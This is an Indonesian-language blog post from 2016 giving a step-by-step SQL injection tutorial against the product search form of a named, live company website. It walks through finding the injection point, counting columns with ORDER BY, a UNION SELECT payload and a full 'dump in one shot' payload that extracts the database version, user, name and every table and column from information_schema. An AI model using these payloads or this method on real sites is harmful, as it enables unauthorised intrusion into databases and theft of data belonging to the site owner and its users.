Monday, December 19, 2016

SQLi memanfaatkan Menu pencarian pada website

Mungkin hampir semua para injektor sudah mengetahui menemukan injek point memanfaatkan menu pencarian pada suatu web.

Bagi yang blom tau dan ingin belajar,  di sini saya akan memberikan sdikit tutorial SQLi memanfaatkan menu pencarian pada suatu web.

Bahan paling utama adalah HackBarMod .

Di sini saya akan memberikan live target targetnya yaitu :
http://pbi.co.id/media.php?module=Product

 

oke d sini saya memanfaatkan menu pencarian barang.
 

Mari di bagian colum pencarian kita masukan injek point nya, yaitu tanda kutip ( ' ).
seperti ini :
 
Jika sudah memasukan injek point nya langsung klik Mulai Pencarian atau tekan enter saja.
maka hasilnya seperti ini :

kita bisa lihat menu detail barangnya menghilang saat kita memberikan injek point pada menu pencarian barang.
Terus bagaimana kita untuk melanjutkan injek nya ?
oke setelah memberikan injek point mari kita lihat HackBarMod. mari kita Load Url dan ceklis menu Post data seperti ini :


 

Kita bisa melihat di bagian bawah muncul sebuah menu post data dan dalam menu post data terdapat injek point yang sudah berubah menjadi Hex Encoding yaitu %27.
nah kita bisa melanjutkan peng injeksian di balakng injek point kita yaitu %27 dengan memberinya comments terlebih dahulu.
mari kita coba memberi commentsnya  +--+- lalu Execute. maka hasilnya seperti ini.
 
ternyata memberi comments +--+- tidak mengembalikan detail produk sperti semula. mari kita coba tanda plus ( + ) di ubah menjadi sepasi . maka hasilnya seperti ini :
 
Kita lihat setlah kita mengubah tanda puls ( + ) menjadi sepasi ternyata work bisa di lihat menu detail produknya kembali seperti semula.
Langkah selanjutnya kita tinggal melakukan order by di belakang injek point atau %27 .
seperti ini :
 
di web ini saya menumkan colum error pada angka 12 seperti ini :
 

kita bisa lihat di saat kita melakukan order by pada column 12 table detail produk - nya menghilang kembali.
jadi column yg tidak error ada 11 columns, mari kita melakukan union select sebanyak column yang tidak error yaitu sebanyak 11 columns .
seperti ini :
 D1=Ukuran&T1=-%27 UNION ALL SELECT+1,2,3,4,5,6,7,8,9,10,11-- -&B1=Mulai+Pencarian

jika berhasil angka togelnya akan muncul seperti ini :
 

Angka togelnya yaitu : 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 .

Nah di bagian Angka yang muncul itu anda bisa melakukan DIOS saya memilih di angka 2 .
Di sini saya menggunakan DIOS : concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))
maka jadinya seperti ini :
D1=Ukuran&T1=-%27 UNION ALL SELECT 1,concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -&B1=Mulai+Pencarian

 Jika melakukanya benar Kita bisa lihat hasilnya seperti ini :
 

Oke gmna mudah bukan ?

Salam hangat dari orie404 dan terima kasih sudah datang ke sini, jika ingin bertanya - tanya silakan chat saya saja.
Diposkan oleh di

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Cool Blue Outer Glow Pointer